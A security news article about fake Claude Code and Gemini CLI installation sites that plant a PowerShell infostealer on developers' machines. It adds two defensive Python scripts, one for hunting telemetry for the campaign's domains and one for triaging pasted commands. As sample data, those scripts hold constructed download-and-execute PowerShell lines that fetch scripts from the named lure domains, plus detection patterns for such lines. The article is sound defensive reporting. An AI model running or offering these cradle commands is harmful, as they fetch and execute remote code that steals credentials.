Hackers Are Impersonating Claude Code and Gemini to Steal Developer Credentials
Security researchers have uncovered a coordinated malware campaign targeting developers through fake websites impersonating Anthropic's Claude Code and Google's Gemini CLI. The threat actors use search engine manipulation to make malicious sites appear above legitimate results, then trick users into downloading infostealers that harvest credentials and sensitive data from enterprise applications.
How Are These Fake Sites Spreading?
The campaign began in early March 2026, with threat actors registering domains designed to mimic official installation pages. Security researchers at EclecticIQ discovered that attackers used SEO poisoning techniques to surface fake domains above legitimate results in search engines. Victims searching for "Gemini CLI" or "Claude Code" installation instructions are directed to attacker-controlled infrastructure instead of official documentation.
The malicious domains include geminicli[.]co[.]com and claudecode[.]co[.]com, which display cloned installation pages that visually match Anthropic's and Google's official documentation. Users are prompted to copy and paste a PowerShell command into their terminal; that command fetches and runs the infostealer inside the user's own PowerShell session.
What Data Are These Infostealers Targeting?
The malware is specifically designed to target enterprise users and developer workstations, harvesting credentials and sensitive information from a wide range of applications. The infostealer operates entirely in memory through PowerShell, leaving little on disk for file-based scanning to catch, and exfiltrates the stolen data in encrypted form to command-and-control servers.
The malware targets multiple categories of sensitive information:
- Web Browsers: Login credentials, session cookies, autofill data, and form history from Chrome, Edge, Brave, and Firefox.
- Collaboration Platforms: Slack local state keys and network cookies, Microsoft Teams cache cookies with decryption of protected local state, Discord LevelDB files, Mattermost session cookies, Zoom encryption keys, and Telegram Desktop session directories.
- Cloud and Financial Services: Cryptocurrency wallet preferences including Brave Wallet and Spectre, cloud storage credentials from Proton Drive, iCloud Drive, Google Drive, MEGA, and OneDrive.
- Remote Access Tools: OpenVPN configuration files and credentials for remote desktop applications.
A single compromised session cookie or local state key from a platform like Slack or Teams can give attackers authenticated access to the victim's entire workspace, without the password or a fresh MFA prompt, including internal channels, shared files, client communications, and connected integrations.
Who Is Behind These Attacks?
EclecticIQ researchers assessed that the campaign is likely geographically tailored to target users in the United States and the United Kingdom, based on the selection of .co.uk, .us.com, and .us.org top-level domains. The similarities between the Gemini CLI and Claude Code attack chains strongly suggest a single threat actor is orchestrating both campaigns.
"The stealer's collection scope reveals a deliberate focus on enterprise users and developer workstations," noted the EclecticIQ researchers in their May 21 report.
After execution, the infostealer connects to command-and-control servers hosted at events[.]msft23[.]com for the Gemini campaign and events[.]ms709[.]com for the Claude Code campaign. The malware also lets attackers run arbitrary remote code execution tasks on compromised devices, a capability financially motivated cybercriminals typically use to move from automated credential theft to hands-on-keyboard intrusions against selected victims.
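Defenders with process, DNS and network telemetry can hunt retroactively for the lure and C2 domains named above. The script below is an added example (not code from EclecticIQ, Anthropic or Google): it refangs the published indicators, correlates events by process ID, and reports every process that queried or connected to one of them. The log lines and their key=value format are constructed for illustration and only loosely follow Sysmon event IDs; the PowerShell command line and the install.ps1 path are assumptions, not the actual lure command, which the report does not reproduce here.

```python
"""
Hunt process, DNS and network telemetry for the lure and C2 domains named in
the article. Added example, not code from EclecticIQ, Anthropic or Google.
Log lines are constructed; field names loosely follow Sysmon event IDs
(1 = process create, 22 = DNS query, 3 = network connection).
"""
from collections import defaultdict
from typing import Optional

# Defanged exactly as published in the article; refang() restores the dots.
# Do not resolve or browse to these hosts.
IOC_DOMAINS_DEFANGED = [
    "geminicli[.]co[.]com",   # Gemini CLI lure page
    "claudecode[.]co[.]com",  # Claude Code lure page
    "events[.]msft23[.]com",  # Gemini campaign C2
    "events[.]ms709[.]com",   # Claude Code campaign C2
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator ("a[.]b") back into a matchable hostname."""
    return indicator.replace("[.]", ".").lower().rstrip(".")


IOC_DOMAINS = frozenset(refang(d) for d in IOC_DOMAINS_DEFANGED)


def matches_ioc(hostname: str) -> Optional[str]:
    """Return the indicator that hostname equals or is a subdomain of, else None."""
    host = hostname.lower().rstrip(".")
    for ioc in IOC_DOMAINS:
        if host == ioc or host.endswith("." + ioc):
            return ioc
    return None


def parse_event(line: str) -> dict:
    """Parse one 'key=value|key=value' line (constructed format) into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def hunt(lines):
    """
    Correlate events by ProcessId and return only the processes that touched an
    indicator: {pid: {"image": ..., "command_line": ..., "indicators": set()}}.
    """
    by_pid = defaultdict(lambda: {"image": "", "command_line": "", "indicators": set()})
    for line in lines:
        ev = parse_event(line)
        pid = ev.get("ProcessId")
        if not pid:
            continue
        rec = by_pid[pid]
        if ev.get("EventID") == "1":          # process creation carries the command line
            rec["image"] = ev.get("Image", "")
            rec["command_line"] = ev.get("CommandLine", "")
        for field in ("QueryName", "DestinationHostname"):
            hit = matches_ioc(ev[field]) if field in ev else None
            if hit:
                rec["indicators"].add(hit)
    return {pid: rec for pid, rec in by_pid.items() if rec["indicators"]}


# Constructed sample telemetry: PID 4120 models the paste-and-run chain the
# article describes (command line and path are assumed); PID 5300 is a benign
# package install included for contrast.
SAMPLE_EVENTS = [
    r"EventID=1|ProcessId=4120|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|ParentImage=C:\Windows\System32\cmd.exe"
    r"|CommandLine=powershell -nop -w hidden -c iex (New-Object Net.WebClient).DownloadString('https://claudecode.co.com/install.ps1')",
    r"EventID=22|ProcessId=4120|QueryName=claudecode.co.com",
    r"EventID=22|ProcessId=4120|QueryName=events.ms709.com",
    r"EventID=3|ProcessId=4120|DestinationHostname=events.ms709.com|DestinationPort=443",
    r"EventID=1|ProcessId=5300|Image=C:\Program Files\nodejs\node.exe"
    r"|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=npm install -g example-package",
    r"EventID=22|ProcessId=5300|QueryName=registry.npmjs.org",
]

if __name__ == "__main__":
    for pid, rec in hunt(SAMPLE_EVENTS).items():
        print(f"[!] PID {pid} {rec['image']}")
        print(f"    indicators:   {sorted(rec['indicators'])}")
        print(f"    command line: {rec['command_line']}")
```

Matching on suffix rather than equality catches subdomains of the C2 hosts; feed the hunt with your own exported telemetry once its fields are mapped to ProcessId, QueryName and DestinationHostname.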
What Should Developers Do to Stay Safe?
Developers should verify they are on the vendor's official installation page before downloading any AI coding tool. Check the URL carefully and bookmark official documentation rather than relying on search results, since a poisoned result can outrank the real page. When installing command-line tools, read any PowerShell command before running it, even if the website looks legitimate: a legitimate installer has no reason to hide its window, skip the profile, base64-encode itself, or pipe downloaded text straight into Invoke-Expression. Prefer the install method the vendor documents over a pasted one-liner. If you have already run such a command, treat every credential category listed above as compromised: change passwords, revoke active sessions and tokens for browsers and collaboration tools, and rebuild the workstation rather than trying to clean it.
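The checks above can be applied mechanically before anything is pasted into a terminal. The script below is an added example (not code from the article, EclecticIQ or the vendors): it decodes a -EncodedCommand payload, flags the download-and-execute idioms described in this campaign, and compares every URL host against an allowlist. ALLOWED_HOSTS is an assumed placeholder to be populated from documentation you have verified yourself, and the three sample commands are constructed to resemble the paste-and-run lure; the page does not reproduce the real one.

```python
"""
Triage a copied install command before running it: decode -EncodedCommand,
flag PowerShell download-and-execute cradles, and check every URL host against
an allowlist. Added example, not code from the article, EclecticIQ or the
vendors. ALLOWED_HOSTS and the sample commands are constructed for illustration.
"""
import base64
import re

# Assumed allowlist; fill it from vendor documentation reached via a bookmark,
# never from a search result.
ALLOWED_HOSTS = {"docs.anthropic.com", "github.com"}

# Heuristics: idioms a vendor's one-line installer has no reason to combine.
CRADLE_PATTERNS = [
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "executes fetched text as code"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\b(irm|iwr)\b", re.I),
     "downloads remote content"),
    (re.compile(r"-(enc|encodedcommand|e)\b", re.I), "base64-encoded command"),
    (re.compile(r"-(w|windowstyle)\s+hidden", re.I), "hides the console window"),
    (re.compile(r"-(nop|noprofile)\b|-(ep|executionpolicy)\s+bypass", re.I),
     "profile/execution-policy evasion flags"),
]
URL_RE = re.compile(r"https?://([^/\s'\"()]+)", re.I)
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_powershell(script: str) -> str:
    """Produce the base64(UTF-16LE) form PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command: str) -> str:
    """Return the decoded payload if the command carries -EncodedCommand, else ''."""
    m = ENC_RE.search(command)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable payload>"


def triage(command: str) -> dict:
    """Inspect a pasted command; return findings, contacted hosts and a verdict."""
    decoded = decode_encoded_command(command)
    text = command + " " + decoded            # scan visible and hidden parts together
    findings = [why for pat, why in CRADLE_PATTERNS if pat.search(text)]
    hosts = sorted({h.lower().split("@")[-1].split(":")[0] for h in URL_RE.findall(text)})
    unknown = [h for h in hosts if h not in ALLOWED_HOSTS]
    if unknown:
        findings.append("contacts non-allowlisted host(s): " + ", ".join(unknown))
    return {
        "decoded": decoded,
        "hosts": hosts,
        "findings": findings,
        "verdict": "do not run" if findings else "no red flags; still read it",
    }


# Constructed samples modelled on the paste-and-run lure the article describes.
LURE_COMMAND = (
    "powershell -nop -w hidden -c "
    "\"iex (New-Object Net.WebClient).DownloadString('https://claudecode.co.com/install.ps1')\""
)
ENCODED_LURE = "powershell -enc " + encode_powershell(
    "irm https://geminicli.co.com/setup.ps1 | iex"
)
BENIGN_COMMAND = "git clone https://github.com/example/repo.git"

if __name__ == "__main__":
    for cmd in (LURE_COMMAND, ENCODED_LURE, BENIGN_COMMAND):
        r = triage(cmd)
        print(f"{r['verdict']:>26}: {cmd[:70]}")
        if r["decoded"]:
            print(f"{'decoded':>26}: {r['decoded']}")
        for f in r["findings"]:
            print(f"{'':>26}  - {f}")
```

The heuristics are deliberately noisy: a legitimate script might use Invoke-WebRequest, but a pasted one-liner that both fetches and evaluates remote text from a host you have not vetted deserves a "do not run" rather than a benefit of the doubt.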
Why Does This Matter for the AI Coding Tool Market?
The campaign highlights growing security risks as AI coding assistants become more prevalent in enterprise environments. As tools like Claude Code gain adoption among developers, threat actors are increasingly targeting them through social engineering and SEO manipulation. The focus on harvesting enterprise credentials suggests attackers view compromised developer workstations as high-value targets for accessing corporate infrastructure and sensitive projects.
This incident comes as competition in the AI coding tool market intensifies. Chinese AI startup DeepSeek is assembling a new team to develop Code Harness, a tool designed to compete directly with Claude Code and OpenAI's Codex. That competitive pressure underscores the importance of secure distribution and installation practices as these tools become more central to development workflows.